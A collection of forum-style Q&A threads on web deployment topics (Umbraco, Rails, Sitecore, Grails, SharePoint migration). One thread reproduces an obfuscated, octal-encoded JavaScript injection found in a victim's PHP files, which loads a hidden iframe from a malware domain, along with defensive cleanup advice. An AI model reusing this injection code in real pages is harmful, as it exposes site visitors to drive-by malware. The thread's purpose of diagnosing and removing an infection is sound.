Umbraco Bi-directional Deployment - umbraco

I'm using Umbraco 7.4.x. I've been trying to figure out the best way to do bi-directional deployments.
As in, we have more than one dev working locally, and we have a dev server and a live server. We have single click deploys from local to dev, but that's only code. We were copying up the databases to dev, but now we also have people who need to enter content on dev. This leads us to making changes on dev database as well and copying down the database. We do all this with Version control of course, but still, this is all very inconvenient.
Is there a better approach to this that I'm missing? I tried using usync a few months ago but we'd often run into crashes.
I have heard of Courier, it seems like it would be good for deploying from dev/stage to production, but would that also work for pushing content/doc type changes to our local machines? I wasn't sure as they're not web servers on the internet but just local IIS Express running through Visual Studios
Thanks in advance!

We use uSync (uSync + uSync.ContentEdition - for moving everything between instances. Give it another shot as it has changed from the point when you're exploring it in the past. It's worth to mention that it requires good configuration on different enviroments to avoid conflicts etc.
You can also use Courier and it's latest version is used by Umbraco Cloud ( which may also interest you as it gives you full control over deployment processes between multiple Umbraco instances.

One option is to have all of your developers set up to work off of the same dev database. On occasion, your developers might have to "Republish the entire site" or reindex the examine indexes to make sure all their cache and TEMP file are up to date. Otherwise, this has worked well for us for many years. One frustrating part of this is that media files uploaded by dev A won't be immediately on the file system for dev B. You should be able to move your media to azure blob storage to work around this problem. There is a package that should help set this up here.
I wouldn't recommend uSync.ContentEdition. I haven't tried it personally, but I have yet to hear a good report about it. uSync on the other hand has been a life saver for us even if it isn't perfect. At this point, we install usync on every site even if we never configure it to read in changes. We like that we can record our changes to document types and datatypes in source control. Working with the shared database setup means that we don't need usync to be reading on our dev and local environments. However, you will need to make sure that your devs all understand usync. If dev A adds a doc type, the usync .def file for that doc type could show up on the file system for dev B. Dev B should not commit that usync file in that situation.
Courier has been working a lot better recently. I wouldn't recommend it unless you are running umbraco 7 and can get the latest version of Courier. Courier is very useful, but you should do a lot of testing with it before you hand it over to a client because Courier gives you the ability to shoot yourself in the foot in a big way. It has definitely improved. In Courier for umbraco 6 I used to have to try really hard to deploy without breaking my site. Now, in Courier for umbraco7, I have to try really hard to break it. This is now a viable option for deploying content changes to production. Just make sure you test it heavily before you use it in a production environment.


More efficient way to view changes on a mobile device without pushing rails app to heroku?

Probably a dumb question:
Right now, to see changes made in development, I run rails s and see the changes on the local version of my site. To see how changes look on my phone, I currently commit to Git (no matter how small the changes) and then push to heroku. This takes some time and results in lots of commits and deployments for minor changes (i.e. CSS stuff).
What is a more efficient way to test changes for rails web apps on mobile?
NOTE: I am aware I can shrink my browser but it never fails I get different outcomes on my phone.
Any help is appreciated.
RELATED: how do i run a development rails app / website on an ipod
You can also use which is a cloud development environment. I like it because not only can I view my work on mobile, but since it's a hosted URL, I can share it with others while my server is running.
1) connect your phone to the same network that your local server is running on and point it to http://[your server's ip]:3000
2) use the XCode iOS Simulator and/or the Android Emulator
you can also use ngrok
which gives you a way to make an external tunnel to the outside world (for free) so you can use it outside of your local network

Found This Hack in my web server php files

How did i get them and what can i do to avoid this in the future?
echo "<script type=\"text/javascript\" language=\"javascript\" >ff=String;fff=\"fromCharCode\";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v=\"eval\";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{}catch(q){asd=1;}if(!asd){w={a:window}.a;vv=v;}}e=w[vv];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0145,0163,0170,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155,0145,047,051,073,015,012,015,012,040,040,040,040,0145,0163,0170,056,0163,0162,0143,040,075,040,047,0150,0164,0164,0160,072,057,057,0141,0142,0163,0157,0154,0165,0164,0145,0147,0151,0146,0164,056,0143,0157,0155,057,0137,0160,0162,0151,0166,0141,0164,0145,057,0143,0154,0153,056,0160,0150,0160,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0160,0157,0163,0151,0164,0151,0157,0156,040,075,040,047,0141,0142,0163,0157,0154,0165,0164,0145,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0142,0157,0162,0144,0145,0162,040,075,040,047,060,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0150,0145,0151,0147,0150,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0167,0151,0144,0164,0150,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0154,0145,0146,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0164,0157,0160,040,075,040,047,061,0160,0170,047,073,015,012,015,012,040,040,040,040,0151,0146,040,050,041,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0145,0163,0170,047,051,051,040,0173,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0167,0162,0151,0164,0145,050,047,074,0144,0151,0166,040,0151,0144,075,0134,047,0145,0163,0170,0134,047,076,074,057,0144,0151,0166,076,047,051,073,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0145,0163,0170,047,051,056,0141,0160,0160,0145,0156,0144,0103,0150,0151,0154,0144,050,0145,0163,0170,051,073,015,012,040,040,040,040,0175,015,012,0175,051,050,051,073);}w=f;s=[];if(window.document)for(i=2-2;-i+478!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]);}xz=e;if(v)xz(s)}</script>";
It seems to be redirecting to or injecting content from absolutegift dot com, a malware distributor. Somebody uploaded it to your server. This person (or bot) may have managed to get your password or he may have used an exploit. Change your passwords, make sure all user input (including uploads) is validated. Make sure you have a firewall running (I recommend csf) and scan your server for rootkits.
Contact your hosting provider and notify them of the issue. This is very important I've shutdown plenty of legit websites because they were compromised and the owner lost all their data.
If you are using a CMS such as Drupal, Wordpress, etc. etc. Make sure you upgrade and change admin passwords. If you have any plugins, make sure they are upgraded.
If you have no CMS, change your FTP & control panel passwords.
As for fixing the problem. If you are using a CMS, an in-place upgrade should replace all the files. If not, you can download all your files and use a word-processor like Notepad++ to do a find-and-replace throughout the directory. Also, your hosting provider might be able to restore from backup, or at least have some experience in fixing it.
To prevent it, don't use a CMS and learn some web security. Possibly hire a pentester.
this happened to me as well on an old site running Drupal 5. What I did is download the site and compared it with a clean copy of the codebase using meld (a graphical diff tool for linux).
I found that there was a file called god.php that was placed in one of the subdirectories and contained a php script which called R57. It's really scary what this thing can do.
Many of my files were infected with something like:
I cleaned this up manually a few times but kept being hacked until I removed the "god.php" file. I assume it might be called differently on your system.
If you have SSH access to the server go to your document root and search for all files containing the string:
grep -R "#8f4d8e#" .
You could also look for your version of the god.php file... look for traces of R57, for example by issuing:
grep -R "R57" .
Mine had a big ASCII art drawing of a bug at the beginning of the file.
I'm not sure how I got it but there were a list of bad things: un-updated very old version of Drupal, PHP4 with register_globals on, shared hosting (and probably a lousy company).
What I did is move the cleaned up site to another hosting company with PHP 5 and changed all passwords: drupal, ftp, mysql etc.

Issue with startitem in Sitecore

We have four different environments - dev VMs, dev, QA and prod. All environments have the following setting for the "website" site:
<site name="website" virtualFolder="/" physicalFolder="/"
rootPath="/sitecore/content" startItem="/home" database="master"
domain="extranet" allowDebug="true" cacheHtml="false"
htmlCacheSize="10MB" registryCacheSize="0" viewStateCacheSize="0"
xslCacheSize="5MB" filteredItemsCacheSize="2MB" enablePreview="true"
enableWebEdit="true" enableDebugger="true"
disableClientData="false" loginPage="/" hostName=""
enableFallback="true" enforceVersionPresence="true"/>.
So on VM and prod, and work.
But on dev and QA, works but doesn't work. (Works with startItem but gets a 404 without it).
This is happening with ISAPI enabled and disabled both (no exceptions).
I am not sure what is going on here or where else to look except to make sure that my start item is in good shape which it seems to be.
What can I do to resolve this? If you need more information please let me know.
Try looking at the:
"linkManager" tag in the web.config, there is a property called:
languageEmbedding: asNeeded | always | never
which could be set differently on those solutiuons.
If you have Multi-Language website it is recommended to go with
languageEmbedding: always
Advantages :
Some time in IE8 the Language cookie is destroyed, because of that
the language displayed is change randomly.(We have faced this issue
in our environment) LanguageEmbadding : Always will keep the Information and will work without any Issue.
If you have set asNeeded then First time the Language will be displayed and next time onward it will be hidden. But this will create issue with Google Analytics. In GA you will have 2 diff URL with same page content so your analysis will be unnecessarily divided in to 2 pages.
And Yes you can check if there is any difference is Config files. As Mentioned by Martijn you can use the Copy the Config, compare it using any file compare tool like WinMerge etc.
What is the Hierarchy in your project?
Sitecore-Content-home-Press or
In my project the setting you have mentioned has database = web.
I can't add a comment, but as Martijn says you need to compare the configs. Now this should be very easy since you should be using config include files and so the changes between the environments should be very minimal. If you are not using them then you should start using them, it makes life much easier to figure out the differences from default Sitecore installation and will also make your upgrades much easier in the future. Or maybe you are using them for the other environments and that is what is causing the issue?
All About web.config Include Files with the Sitecore ASP.NET CMS
As for comparing the configs, use a file comparison tool like WinMerge as already metioned, that should weed out the differences much more easily.
Also, as Maulik says, default config has: database="web" content="master"
This seems like config differences. Compare the live configs by using This way you can see the actual config which also includes all your /app_config/include/ files

Modifying Grails apps post deployment

I'm investigating Grails vs. other Agile web frameworks, and one key use case I'm trying to support is the ability to modify controllers and install plugins post deployment. It appears that this isn't possible with Grails, but I want to make sure before I write it off.
As far as modifying controllers goes, it would be sufficient if the Groovlet behavior existed (compile-on-demand).
As far as plugin installs go, I understand this may be a long shot, but I thought I'd check to be sure.
For your information, I need this because I work on a product that requires a little site-specific customization, such as adding validation of simple meta-data, integrating with customer security environments, and maybe even including new controllers/pages quickly.
Out of the box, no, grails doesn't really support what you want. There may be ways to customize it but I've never looked into it. A PHP framework might be more of your ally since there is no real deployment process other than copying PHP files to a location.
That said, I personally would prefer a strict set of deployment policies. And honestly, deploying changes with Grails is as simple as running the 'grails war' command and copying that war to your servlet container. The site's downtime is negligible and if you have multiple web servers with a load-balancer, your customers should never see down time due to deployments.
Although it's not recommended for complex coding; You could execute groovy code from a string that you could store in database or a file on the fly at run time:
check out Groovy template engine:
but even then, you are still limited on what you can do or can't do let alone debugging will lack. you may want to consider an interpreted language; few to mention PHP/Perl/Coldfusion.

Complete MOSS 2007 Migration

The situation at the moment is that we have a sharepoint server which started out as a pilot but now actually runs as the production environment. The server on which sharepoint runs is an old machine which does not conforms the standard requirements so I want to move the current environment to the shiny new server.
I've red a lot about migrating the MOSS services, databases and content and stuff but to be honest I am kinda lost in a sea of information and I can't find the right method to do this, I've tried to install MOSS 2007 on the new server as a clean install, restored the databasses on the new server, restored the backup on the new server which I made with Sharepoint Central Administration, alas, I did not worked :-(
Lots of "Can't find this" and "Can't find that" errors...
It should be possible to grab all the data/sites/subsites/databasses/content/documents and everything else and restore that to the new server right?
Anyways, I was hoping for some step-by-step information... :-)
I think I found a way to do a complete migration...
Install a fresh version of MOSS 2007 on the new server (Server_B). Install the features and solutions you have on Server_A. Then use the SPContentDeploymentWizard which can be downloaded for free from CodePlex to make an export of all site content and import these on Server_B. Also backup custom databases needed by features and create these on Server_B.
I do have a almost completly equal server running now, some funky errors pop up now and then so I don't think it's the best way to do it...
Also, custom developed webparts need to be deployed manually to the new server, I didn't find a way to migrate these
You are on the right track. The CodePlex solution is just a wizard GUI of what you would have to do at the command line via stsadm.
Essentially you:
Build the new server w/ all the patches, Service Packs etc that are on the old.
You will want to run a command at the cmd line to scan for and resolve any orphaned sites in your databases on Server A (command slips my mind but you can find it in TechNet - I think it's repair database - something like that)
Limit access to Server A - so you don't have user changes during your migration.
Prepare the databases for migration - another stsadm command - stsadm -o preparetomove
Detach the databases from Server A. Horrible command of -o deletedatabase - it deletes the reference but not the actual database (but still!)
Attach the databases to Server B
You should be good at that point.
As you've discovered - you can't migrate custom code, webparts etc. These need to be reinstalled. One of the reasons that solutions / features are really recommend for customizations.
Also - the search dbs, indexes etc. need to be recreated. You can't bring those over. But that's fairly straightforward - and makes sense when you think about it.
Use these scripts if you need.
